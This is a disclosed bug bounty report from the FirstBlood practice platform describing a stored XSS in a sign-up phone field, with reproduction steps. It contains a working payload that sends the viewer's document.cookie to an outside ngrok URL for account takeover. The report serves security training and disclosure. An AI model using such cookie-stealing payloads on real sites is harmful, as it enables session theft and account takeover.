FirstBlood-#1148 — Stored xss in HackerBack sign up phone number to Account takeover
This issue was discovered on FirstBlood v3
On 2022-12-08, didsec Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
I have discovered a stored XSS vulnerability affecting the HackerBack sign up allowing for the retravel of the users cookie that is not using HTTP_ONLY
Payload
<img/src=x onerror="window.location.href='https://ngrok.io?cookie='%2bdocument.cookie">
To reproduce:
- Visit
firstbloodhackers.com/hackerback.html
- Click the
join event button
- Add any name and phone number
- click
sign up and intercept the request
- replace the
phone value with the payload
- forward the request
When a user views the drpanel the users drps cookie will be sent to your ngrok server
Impact:
- The attacker can steal the cookie from whoever views the page allowing a account takeover.
- The attacker can steal data from whoever views the page.
- Users can execute arbitrary JavaScript code in the context of other users.
P1 CRITICAL
FirstBlood ID: 59
Vulnerability Type: Stored XSS
It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.